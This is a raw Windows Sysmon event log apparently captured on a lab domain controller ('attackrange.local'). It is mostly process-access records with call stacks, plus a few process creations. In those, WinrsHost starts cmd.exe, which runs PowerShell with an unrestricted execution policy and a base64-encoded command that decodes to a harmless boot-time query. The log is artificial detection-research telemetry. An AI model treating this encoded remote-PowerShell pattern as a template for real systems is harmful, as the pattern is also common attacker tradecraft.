13:08:49.121{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000467Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.121{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000466Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.121{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000465Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.121{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000464Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.121{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000463Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.121{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000462Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.121{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000461Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.121{08A6967A-40D2-6000-0500-000000009901}644660C:\Windows\system32\csrss.exe{08A6967A-4261-6000-E402-000000009901}4464C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000460Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.121{08A6967A-4261-6000-E302-000000009901}25764872C:\Windows\system32\cmd.exe{08A6967A-4261-6000-E402-000000009901}4464C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000459Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.131{08A6967A-4261-6000-E402-000000009901}4464C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUAC:\Users\Administrator\ATTACKRANGE\Administrator{08A6967A-4260-6000-168F-110000000000}0x118f160HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{08A6967A-4261-6000-E302-000000009901}2576C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUA 10341000x8000000000000000458Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.121{08A6967A-4261-6000-E202-000000009901}27884380C:\Windows\system32\conhost.exe{08A6967A-4261-6000-E302-000000009901}2576C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000457Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.121{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000456Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.121{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000455Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.121{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000454Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.121{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000453Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.121{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000452Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.121{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000451Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.121{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000450Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.121{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000449Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.121{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000448Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.121{08A6967A-40D2-6000-0500-000000009901}644768C:\Windows\system32\csrss.exe{08A6967A-4261-6000-E302-000000009901}2576C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000447Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.121{08A6967A-4261-6000-E102-000000009901}48204432C:\Windows\system32\WinrsHost.exe{08A6967A-4261-6000-E302-000000009901}2576C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\WinrsHost.exe+2c94|C:\Windows\system32\WinrsHost.exe+2eb1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b 154100x8000000000000000446Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.124{08A6967A-4261-6000-E302-000000009901}2576C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUAC:\Users\Administrator\ATTACKRANGE\Administrator{08A6967A-4260-6000-168F-110000000000}0x118f160HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{08A6967A-4261-6000-E102-000000009901}4820C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 10341000x8000000000000000445Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.121{08A6967A-40DD-6000-0B00-000000009901}868604C:\Windows\system32\lsass.exe{08A6967A-40E0-6000-1400-000000009901}1300C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000444Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.121{08A6967A-40DD-6000-0B00-000000009901}868604C:\Windows\system32\lsass.exe{08A6967A-40E0-6000-1400-000000009901}1300C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000443Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.105{08A6967A-40DD-6000-0B00-000000009901}868604C:\Windows\system32\lsass.exe{08A6967A-40E0-6000-1400-000000009901}1300C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000442Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 